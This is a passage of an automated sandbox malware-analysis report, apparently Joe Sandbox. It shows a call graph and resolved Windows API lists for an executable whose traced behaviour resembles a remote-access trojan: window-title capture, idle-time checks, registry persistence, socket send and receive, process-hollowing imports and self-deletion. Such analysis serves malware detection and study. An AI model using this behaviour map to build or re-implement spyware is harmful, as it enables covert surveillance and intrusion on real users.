_abort 48457->48459 48460 44062d 20 API calls _abort 48457->48460 48459->48455 48460->48459 48468 40ad1f 48461->48468 48462 40a2cd 48463 40ad79 Sleep GetForegroundWindow GetWindowTextLengthW 48465 40b93f 28 API calls 48463->48465 48465->48468 48468->48462 48468->48463 48470 41bb77 GetLastInputInfo GetTickCount 48468->48470 48471 40adbf GetWindowTextW 48468->48471 48473 401f09 11 API calls 48468->48473 48474 40af17 48468->48474 48475 40b927 28 API calls 48468->48475 48477 40ae84 Sleep 48468->48477 48478 441ed1 20 API calls 48468->48478 48480 402093 28 API calls 48468->48480 48484 403014 28 API calls 48468->48484 48485 406383 28 API calls 48468->48485 48487 40ae0c 48468->48487 48488 40a671 12 API calls 48468->48488 48489 41bcef 28 API calls 48468->48489 48490 401fd8 11 API calls 48468->48490 48491 43445a EnterCriticalSection LeaveCriticalSection WaitForSingleObjectEx __Init_thread_wait 48468->48491 48492 401f86 48468->48492 48496 434801 23 API calls __onexit 48468->48496 48497 43441b SetEvent ResetEvent EnterCriticalSection LeaveCriticalSection __Init_thread_wait 48468->48497 48498 40907f 28 API calls 48468->48498 48500 40b9b7 28 API calls 48468->48500 48501 40b783 40 API calls 2 library calls 48468->48501 48502 4052fd 28 API calls 48468->48502 48470->48468 48471->48468 48473->48468 48476 401f09 11 API calls 48474->48476 48475->48468 48476->48462 48477->48468 48478->48468 48480->48468 48483 409097 28 API calls 48483->48487 48484->48468 48485->48468 48487->48468 48487->48483 48499 40b19f 31 API calls _Yarn 48487->48499 48488->48468 48489->48468 48490->48468 48493 401f8e 48492->48493 48494 402252 11 API calls 48493->48494 48495 401f99 48494->48495 48495->48468 48496->48468 48497->48468 48498->48468 48499->48487 48500->48468 48501->48468 48505 40322e 48504->48505 48514 403618 48505->48514 48507 40323b 48507->48325 48509 40326e 48508->48509 48510 402252 11 API calls 48509->48510 48511 403288 48510->48511 48512 402336 11 API calls 48511->48512 48513 403031 48512->48513 48513->47938 48515 403626 48514->48515 48516 403644 48515->48516 48517 40362c 48515->48517 48519 40365c 48516->48519 48520 40369e 48516->48520 48525 4036a6 28 API calls 48517->48525 48521 403642 48519->48521 48524 4027e6 28 API calls 48519->48524 48526 4028a4 22 API calls 48520->48526 48521->48507 48524->48521 48525->48521 48528 404186 48527->48528 48529 402252 11 API calls 48528->48529 48530 404191 48529->48530 48538 4041bc 48530->48538 48533 4042fc 48549 404353 48533->48549 48535 40430a 48536 403262 11 API calls 48535->48536 48537 404319 48536->48537 48537->47946 48539 4041c8 48538->48539 48542 4041d9 48539->48542 48541 40419c 48541->48533 48543 4041e9 48542->48543 48544 404206 48543->48544 48545 4041ef 48543->48545 48546 4027e6 28 API calls 48544->48546 48547 404267 28 API calls 48545->48547 48548 404204 48546->48548 48547->48548 48548->48541 48550 40435f 48549->48550 48553 404371 48550->48553 48552 40436d 48552->48535 48554 40437f 48553->48554 48555 404385 48554->48555 48556 40439e 48554->48556 48619 4034e6 28 API calls 48555->48619 48557 402888 22 API calls 48556->48557 48558 4043a6 48557->48558 48560 404419 48558->48560 48561 4043bf 48558->48561 48620 4028a4 22 API calls 48560->48620 48563 4027e6 28 API calls 48561->48563 48572 40439c 48561->48572 48563->48572 48572->48552 48619->48572 48627 43ab1a 48621->48627 48625 4138ca RegSetValueExA RegCloseKey 48624->48625 48626 4138f4 48624->48626 48625->48626 48626->47962 48630 43aa9b 48627->48630 48629 40170d 48629->47964 48631 43aaaa 48630->48631 48632 43aabe 48630->48632 48636 44062d 20 API calls _abort 48631->48636 48635 43aaaf __alldvrm _abort 48632->48635 48637 4489d7 11 API calls 2 library calls 48632->48637 48635->48629 48636->48635 48637->48635 48641 41b98a _Yarn ___scrt_get_show_window_mode 48638->48641 48639 402093 28 API calls 48640 414f84 48639->48640 48640->47971 48641->48639 48642->47988 48644 414f33 48643->48644 48645 414f3d getaddrinfo WSASetLastError 48643->48645 48784 414dc1 29 API calls ___std_exception_copy 48644->48784 48645->48041 48647 414f38 48647->48645 48649 404846 socket 48648->48649 48650 404839 48648->48650 48652 404860 CreateEventW 48649->48652 48653 404842 48649->48653 48785 40489e WSAStartup 48650->48785 48652->48041 48653->48041 48654 40483e 48654->48649 48654->48653 48656 404f65 48655->48656 48657 404fea 48655->48657 48658 404f6e 48656->48658 48659 404fc0 CreateEventA CreateThread 48656->48659 48660 404f7d GetLocalTime 48656->48660 48657->48041 48658->48659 48659->48657 48787 405150 48659->48787 48661 41bc1f 28 API calls 48660->48661 48662 404f91 48661->48662 48786 4052fd 28 API calls 48662->48786 48671 404a1b 48670->48671 48672 4048ee 48670->48672 48673 404a21 WSAGetLastError 48671->48673 48674 40497e 48671->48674 48672->48674 48676 40531e 28 API calls 48672->48676 48694 404923 48672->48694 48673->48674 48675 404a31 48673->48675 48674->48041 48677 404a36 48675->48677 48682 404932 48675->48682 48679 40490f 48676->48679 48796 41cb72 30 API calls 48677->48796 48683 402093 28 API calls 48679->48683 48681 40492b 48681->48682 48685 404941 48681->48685 48686 402093 28 API calls 48682->48686 48688 40491e 48683->48688 48684 404a40 48797 4052fd 28 API calls 48684->48797 48696 404950 48685->48696 48697 404987 48685->48697 48687 404a80 48686->48687 48690 402093 28 API calls 48687->48690 48691 41b580 80 API calls 48688->48691 48693 404a8f 48690->48693 48691->48694 48698 41b580 80 API calls 48693->48698 48791 420cf1 27 API calls 48694->48791 48701 402093 28 API calls 48696->48701 48793 421ad1 54 API calls 48697->48793 48698->48674 48704 40495f 48701->48704 48703 40498f 48707 4049c4 48703->48707 48708 404994 48703->48708 48705 402093 28 API calls 48704->48705 48709 40496e 48705->48709 48795 420e97 28 API calls 48707->48795 48712 402093 28 API calls 48708->48712 48713 41b580 80 API calls 48709->48713 48715 4049a3 48712->48715 48716 404973 48713->48716 48714 4049cc 48717 4049f9 CreateEventW CreateEventW 48714->48717 48719 402093 28 API calls 48714->48719 48718 402093 28 API calls 48715->48718 48792 41e7a2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 48716->48792 48717->48674 48720 4049b2 48718->48720 48722 4049e2 48719->48722 48723 41b580 80 API calls 48720->48723 48725 402093 28 API calls 48722->48725 48724 4049b7 48723->48724 48794 421143 52 API calls 48724->48794 48727 4049f1 48725->48727 48728 41b580 80 API calls 48727->48728 48729 4049f6 48728->48729 48729->48717 48798 41b847 GlobalMemoryStatusEx 48730->48798 48732 41b886 48732->48041 48799 4145bb 48733->48799 48737 40dde0 48736->48737 48738 41353a 3 API calls 48737->48738 48739 40dde7 48738->48739 48740 413584 3 API calls 48739->48740 48741 40ddff 48739->48741 48740->48741 48741->48041 48743 4020b7 28 API calls 48742->48743 48744 41bce8 48743->48744 48744->48041 48746 41bdbc 48745->48746 48747 4020b7 28 API calls 48746->48747 48748 41bdce 48747->48748 48748->48041 48749->48050 48751 436f10 ___scrt_get_show_window_mode 48750->48751 48752 41bb46 GetForegroundWindow GetWindowTextW 48751->48752 48753 40417e 28 API calls 48752->48753 48754 41bb70 48753->48754 48754->48050 48756 402093 28 API calls 48755->48756 48757 40f931 48756->48757 48757->48050 48758->48050 48760 4020df 11 API calls 48759->48760 48761 404c27 48760->48761 48762 4020df 11 API calls 48761->48762 48776 404c30 48762->48776 48763 43bda0 _Yarn 21 API calls 48763->48776 48765 404c96 48767 404ca1 48765->48767 48765->48776 48766 4020b7 28 API calls 48766->48776 48850 404e26 99 API calls 48767->48850 48768 401fe2 28 API calls 48768->48776 48770 404ca8 48772 401fd8 11 API calls 48770->48772 48771 401fd8 11 API calls 48771->48776 48773 404cb1 48772->48773 48774 401fd8 11 API calls 48773->48774 48775 404cba 48774->48775 48775->48019 48776->48763 48776->48765 48776->48766 48776->48768 48776->48771 48837 404cc3 48776->48837 48849 404b96 57 API calls 48776->48849 48778->48041 48779->48019 48781->48050 48782->48019 48783->48019 48784->48647 48785->48654 48790 40515c 102 API calls 48787->48790 48789 405159 48790->48789 48791->48681 48792->48674 48793->48703 48794->48716 48795->48714 48796->48684 48798->48732 48802 41458e 48799->48802 48803 4145a3 ___scrt_initialize_default_local_stdio_options 48802->48803 48806 43f7ed 48803->48806 48809 43c540 48806->48809 48810 43c580 48809->48810 48811 43c568 48809->48811 48810->48811 48813 43c588 48810->48813 48831 44062d 20 API calls _abort 48811->48831 48832 43a837 36 API calls 3 library calls 48813->48832 48815 43c598 48833 43ccc6 20 API calls 2 library calls 48815->48833 48816 43c56d _abort 48824 43502b 48816->48824 48819 4145b1 48819->48041 48820 43c610 48834 43d334 51 API calls 3 library calls 48820->48834 48823 43c61b 48835 43cd30 20 API calls _free 48823->48835 48825 435036 IsProcessorFeaturePresent 48824->48825 48826 435034 48824->48826 48828 435078 48825->48828 48826->48819 48836 43503c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 48828->48836 48830 43515b 48830->48819 48831->48816 48832->48815 48833->48820 48834->48823 48835->48816 48836->48830 48838 4020df 11 API calls 48837->48838 48847 404cde 48838->48847 48839 404e13 48840 401fd8 11 API calls 48839->48840 48841 404e1c 48840->48841 48841->48765 48842 4041a2 28 API calls 48842->48847 48843 401fe2 28 API calls 48843->48847 48844 401fc0 28 API calls 48846 404dad CreateEventA CreateThread WaitForSingleObject CloseHandle 48844->48846 48845 4020f6 28 API calls 48845->48847 48846->48847 48851 415b25 48846->48851 48847->48839 48847->48842 48847->48843 48847->48844 48847->48845 48848 401fd8 11 API calls 48847->48848 48848->48847 48849->48776 48850->48770 48852 4020f6 28 API calls 48851->48852 48853 415b47 SetEvent 48852->48853 48854 415b5c 48853->48854 48855 4041a2 28 API calls 48854->48855 48856 415b76 48855->48856 48857 4020f6 28 API calls 48856->48857 48858 415b86 48857->48858 48859 4020f6 28 API calls 48858->48859 48860 415b98 48859->48860 48861 41beac 28 API calls 48860->48861 48862 415ba1 48861->48862 48863 4170c4 48862->48863 48865 415bc1 GetTickCount 48862->48865 48866 415d6a 48862->48866 48864 401e8d 11 API calls 48863->48864 48868 4170cd 48864->48868 48869 41bc1f 28 API calls 48865->48869 48866->48863 48867 415d20 48866->48867 48867->48863 48937 4050e4 84 API calls 48867->48937 48871 401fd8 11 API calls 48868->48871 48872 415bd2 48869->48872 48874 4170d9 48871->48874 48930 41bb77 GetLastInputInfo GetTickCount 48872->48930 48876 401fd8 11 API calls 48874->48876 48875 415bde 48877 41bc1f 28 API calls 48875->48877 48878 4170e5 48876->48878 48879 415be9 48877->48879 48880 41bb27 30 API calls 48879->48880 48881 415bf7 48880->48881 48882 41bdaf 28 API calls 48881->48882 48883 415c05 48882->48883 48884 401e65 22 API calls 48883->48884 48885 415c13 48884->48885 48931 402f31 28 API calls 48885->48931 48887 415c21 48932 402ea1 28 API calls 48887->48932 48889 415c30 48890 402f10 28 API calls 48889->48890 48891 415c3f 48890->48891 48933 402ea1 28 API calls 48891->48933 48893 415c4e 48894 402f10 28 API calls 48893->48894 48895 415c5a 48894->48895 48934 402ea1 28 API calls 48895->48934 48897 415c64 48935 404aa1 61 API calls _Yarn 48897->48935 48899 415c73 48900 401fd8 11 API calls 48899->48900 48901 415c7c 48900->48901 48902 401fd8 11 API calls 48901->48902 48903 415c88 48902->48903 48904 401fd8 11 API calls 48903->48904 48905 415c94 48904->48905 48906 401fd8 11 API calls 48905->48906 48907 415ca0 48906->48907 48908 401fd8 11 API calls 48907->48908 48909 415cac 48908->48909 48910 401fd8 11 API calls 48909->48910 48911 415cb8 48910->48911 48912 401f09 11 API calls 48911->48912 48913 415cc1 48912->48913 48914 401fd8 11 API calls 48913->48914 48915 415cca 48914->48915 48916 401fd8 11 API calls 48915->48916 48917 415cd3 48916->48917 48918 401e65 22 API calls 48917->48918 48919 415cde 48918->48919 48920 43bb2c _strftime 40 API calls 48919->48920 48921 415ceb 48920->48921 48922 415cf0 48921->48922 48923 415d16 48921->48923 48925 415d09 48922->48925 48926 415cfe 48922->48926 48924 401e65 22 API calls 48923->48924 48924->48867 48928 404f51 105 API calls 48925->48928 48936 404ff4 82 API calls 48926->48936 48929 415d04 48928->48929 48929->48863 48930->48875 48931->48887 48932->48889 48933->48893 48934->48897 48935->48899 48936->48929 48937->48929 48939->48091 48940->48115 48941->48117 48942->48105 48943->48109 48944->48116 48945->48150 48950 40f7fd 48948->48950 48949 413584 3 API calls 48949->48950 48950->48949 48951 40f82f 48950->48951 48952 40f8a1 48950->48952 48954 40f891 Sleep 48950->48954 48953 409097 28 API calls 48951->48953 48951->48954 48957 41bcef 28 API calls 48951->48957 48963 401f09 11 API calls 48951->48963 48967 402093 28 API calls 48951->48967 48970 4137aa 14 API calls 48951->48970 48981 40d0d1 112 API calls ___scrt_get_show_window_mode 48951->48981 48982 41384f 14 API calls 48951->48982 48955 409097 28 API calls 48952->48955 48953->48951 48954->48950 48958 40f8ac 48955->48958 48957->48951 48959 41bcef 28 API calls 48958->48959 48960 40f8b8 48959->48960 48983 41384f 14 API calls 48960->48983 48963->48951 48964 40f8cb 48965 401f09 11 API calls 48964->48965 48966 40f8d7 48965->48966 48968 402093 28 API calls 48966->48968 48967->48951 48969 40f8e8 48968->48969 48971 4137aa 14 API calls 48969->48971 48970->48951 48972 40f8fb 48971->48972 48984 41288b TerminateProcess WaitForSingleObject 48972->48984 48974 40f903 ExitProcess 48985 412829 62 API calls 48976->48985 48982->48951 48983->48964 48984->48974 48986 42f97e 48987 42f989 48986->48987 48988 42f99d 48987->48988 48990 432f7f 48987->48990 48991 432f8a 48990->48991 48992 432f8e 48990->48992 48991->48988 48994 440f5d 48992->48994 48995 446206 48994->48995 48996 446213 48995->48996 48997 44621e 48995->48997 48998 4461b8 ___crtLCMapStringA 21 API calls 48996->48998 48999 446226 48997->48999 49005 44622f __Getctype 48997->49005 49004 44621b 48998->49004 49002 446802 _free 20 API calls 48999->49002 49000 446234 49007 44062d 20 API calls _abort 49000->49007 49001 446259 RtlReAllocateHeap 49001->49004 49001->49005 49002->49004 49004->48991 49005->49000 49005->49001 49008 443001 7 API calls 2 library calls 49005->49008 49007->49004 49008->49005 49009 40165e 49010 401666 49009->49010 49011 401669 49009->49011 49012 4016a8 49011->49012 49015 401696 49011->49015 49013 43455e new 22 API calls 49012->49013 49014 40169c 49013->49014 49016 43455e new 22 API calls 49015->49016 49016->49014 49017 426cdc 49022 426d59 send 49017->49022 49023 41e04e 49024 41e063 _Yarn ___scrt_get_show_window_mode 49023->49024 49036 41e266 49024->49036 49042 432f55 21 API calls _Yarn 49024->49042 49027 41e277 49028 41e21a 49027->49028 49038 432f55 21 API calls _Yarn 49027->49038 49030 41e213 ___scrt_get_show_window_mode 49030->49028 49043 432f55 21 API calls _Yarn 49030->49043 49032 41e2b0 ___scrt_get_show_window_mode 49032->49028 49039 4335db 49032->49039 49034 41e240 ___scrt_get_show_window_mode 49034->49028 49044 432f55 21 API calls _Yarn 49034->49044 49036->49028 49037 41dbf3 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_get_show_window_mode 49036->49037 49037->49027 49038->49032 49045 4334fa 49039->49045 49041 4335e3 49041->49028 49042->49030 49043->49034 49044->49036 49046 433513 49045->49046 49050 433509 49045->49050 49046->49050 49051 432f55 21 API calls _Yarn 49046->49051 49048 433534 49048->49050 49052 4338c8 CryptAcquireContextA 49048->49052 49050->49041 49051->49048 49053 4338e4 49052->49053 49054 4338e9 CryptGenRandom 49052->49054 49053->49050 49054->49053 49055 4338fe CryptReleaseContext 49054->49055 49055->49053 49056 426c6d 49062 426d42 recv 49056->49062

                                              Executed Functions

                                              Function 0041CBE1 Relevance: 148.9, APIs: 52, Strings: 33, Instructions: 176libraryloaderCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CBF6
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CBFF
                                              • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CC19
                                              • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC2B
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CC2E
                                              • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC3F
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CC42
                                              • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040EA1C), ref: 0041CC54
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CC57
                                              • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040EA1C), ref: 0041CC63
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CC66
                                              • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CC7A
                                              • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CC8E
                                              • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040EA1C), ref: 0041CC9F
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CCA2
                                              • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CCB6
                                              • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CCCA
                                              • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CCDE
                                              • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CCF2
                                              • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CD06
                                              • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040EA1C), ref: 0041CD14
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CD17
                                              • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040EA1C), ref: 0041CD28
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CD2B
                                              • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040EA1C), ref: 0041CD38
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CD3B
                                              • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040EA1C), ref: 0041CD48
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CD4B
                                              • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040EA1C), ref: 0041CD5D
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CD60
                                              • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040EA1C), ref: 0041CD6D
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CD70
                                              • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040EA1C), ref: 0041CD81
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CD84
                                              • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040EA1C), ref: 0041CD95
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CD98
                                              • LoadLibraryA.KERNEL32(Rstrtmgr,RmStartSession,?,?,?,?,0040EA1C), ref: 0041CDAA
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CDAD
                                              • LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,0040EA1C), ref: 0041CDBA
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CDBD
                                              • LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,0040EA1C), ref: 0041CDCA
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CDCD
                                              • LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,0040EA1C), ref: 0041CDDA
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CDDD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AddressProc$LibraryLoad$HandleModule
                                              • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                              • API String ID: 4236061018-3687161714
                                              • Opcode ID: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                                              • Instruction ID: 87b5fa294a9840a4da0a94e675c49188b16ea4214af7843bc20054d8537ab592
                                              • Opcode Fuzzy Hash: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                                              • Instruction Fuzzy Hash: 06419AA0E8035879DA107BB65D8DE3B3E5CD9857953614837B05C93550FBBCDC408EAE
                                              Function 0040EA00 Relevance: 90.0, APIs: 15, Strings: 36, Instructions: 795COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 5 40ea00-40ea82 call 41cbe1 GetModuleFileNameW call 40f3fe call 4020f6 * 2 call 41beac call 40fb52 call 401e8d call 43fd50 22 40ea84-40eac9 call 40fbee call 401e65 call 401fab call 410f72 call 40fb9f call 40f3eb 5->22 23 40eace-40eb96 call 401e65 call 401fab call 401e65 call 40531e call 406383 call 401fe2 call 401fd8 * 2 call 401e65 call 401fc0 call 405aa6 call 401e65 call 4051e3 call 401e65 call 4051e3 5->23 49 40ef2d-40ef3e call 401fd8 22->49 69 40eb98-40ebe3 call 406c59 call 401fe2 call 401fd8 call 401fab call 413584 23->69 70 40ebe9-40ec04 call 401e65 call 40b9f8 23->70 69->70 100 40f38a-40f3a5 call 401fab call 4139e4 call 4124b0 69->100 79 40ec06-40ec25 call 401fab call 413584 70->79 80 40ec3e-40ec45 call 40d0a4 70->80 79->80 98 40ec27-40ec3d call 401fab call 4139e4 79->98 88 40ec47-40ec49 80->88 89 40ec4e-40ec55 80->89 92 40ef2c 88->92 93 40ec57 89->93 94 40ec59-40ec65 call 41b354 89->94 92->49 93->94 104 40ec67-40ec69 94->104 105 40ec6e-40ec72 94->105 98->80 126 40f3aa-40f3db call 41bcef call 401f04 call 413a5e call 401f09 * 2 100->126 104->105 108 40ecb1-40ecc4 call 401e65 call 401fab 105->108 109 40ec74 call 407751 105->109 127 40ecc6 call 407790 108->127 128 40eccb-40ed53 call 401e65 call 41bcef call 401f13 call 401f09 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab 108->128 118 40ec79-40ec7b 109->118 120 40ec87-40ec9a call 401e65 call 401fab 118->120 121 40ec7d-40ec82 call 407773 call 40729b 118->121 120->108 141 40ec9c-40eca2 120->141 121->120 156 40f3e0-40f3ea call 40dd7d call 414f65 126->156 127->128 177 40ed55-40ed6e call 401e65 call 401fab call 43bb56 128->177 178 40edbb-40edbf 128->178 141->108 144 40eca4-40ecaa 141->144 144->108 147 40ecac call 40729b 144->147 147->108 177->178 203 40ed70-40edb6 call 401e65 call 401fab call 401e65 call 401fab call 40da6f call 401f13 call 401f09 177->203 179 40ef41-40efa1 call 436f10 call 40247c call 401fab * 2 call 413733 call 409092 178->179 180 40edc5-40edcc 178->180 234 40efa6-40effa call 401e65 call 401fab call 402093 call 401fab call 4137aa call 401e65 call 401fab call 43bb2c 179->234 182 40ee4a-40ee54 call 409092 180->182 183 40edce-40ee48 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 40ce34 180->183 193 40ee59-40ee7d call 40247c call 434829 182->193 183->193 211 40ee8c 193->211 212 40ee7f-40ee8a call 436f10 193->212 203->178 217 40ee8e-40eed9 call 401f04 call 43f859 call 40247c call 401fab call 40247c call 401fab call 413982 211->217 212->217 271 40eede-40ef03 call 434832 call 401e65 call 40b9f8 217->271 286 40f017-40f019 234->286 287 40effc 234->287 271->234 288 40ef09-40ef28 call 401e65 call 41bcef call 40f4af 271->288 290 40f01b-40f01d 286->290 291 40f01f 286->291 289 40effe-40f015 call 41ce2c CreateThread 287->289 288->234 306 40ef2a 288->306 294 40f025-40f101 call 402093 * 2 call 41b580 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 43bb2c call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab StrToIntA call 409e1f call 401e65 call 401fab 289->294 290->289 291->294 344 40f103-40f13a call 43455e call 401e65 call 401fab CreateThread 294->344 345 40f13c 294->345 306->92 346 40f13e-40f156 call 401e65 call 401fab 344->346 345->346 356 40f194-40f1a7 call 401e65 call 401fab 346->356 357 40f158-40f18f call 43455e call 401e65 call 401fab CreateThread 346->357 367 40f207-40f21a call 401e65 call 401fab 356->367 368 40f1a9-40f202 call 401e65 call 401fab call 401e65 call 401fab call 40da23 call 401f13 call 401f09 CreateThread 356->368 357->356 379 40f255-40f279 call 41b69e call 401f13 call 401f09 367->379 380 40f21c-40f250 call 401e65 call 401fab call 401e65 call 401fab call 43bb2c call 40c19d 367->380 368->367 400 40f27b-40f27c SetProcessDEPPolicy 379->400 401 40f27e-40f291 CreateThread 379->401 380->379 400->401 404 40f293-40f29d CreateThread 401->404 405 40f29f-40f2a6 401->405 404->405 408 40f2b4-40f2bb 405->408 409 40f2a8-40f2b2 CreateThread 405->409 412 40f2c9 408->412 413 40f2bd-40f2c0 408->413 409->408 416 40f2ce-40f302 call 402093 call 4052fd call 402093 call 41b580 call 401fd8 412->416 417 40f2c2-40f2c7 413->417 418 40f307-40f31a call 401fab call 41353a 413->418 416->418 417->416 426 40f31f-40f322 418->426 426->156 427 40f328-40f368 call 41bcef call 401f04 call 413656 call 401f09 call 401f04 426->427 443 40f381-40f386 DeleteFileW 427->443 444 40f388 443->444 445 40f36a-40f36d 443->445 444->126 445->126 446 40f36f-40f37c Sleep call 401f04 445->446 446->443
                                              APIs
                                                • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CBF6
                                                • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CBFF
                                                • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                                • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC19
                                                • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC2B
                                                • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC2E
                                                • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC3F
                                                • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC42
                                                • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040EA1C), ref: 0041CC54
                                                • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC57
                                                • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040EA1C), ref: 0041CC63
                                                • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC66
                                                • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                                • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC7A
                                                • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
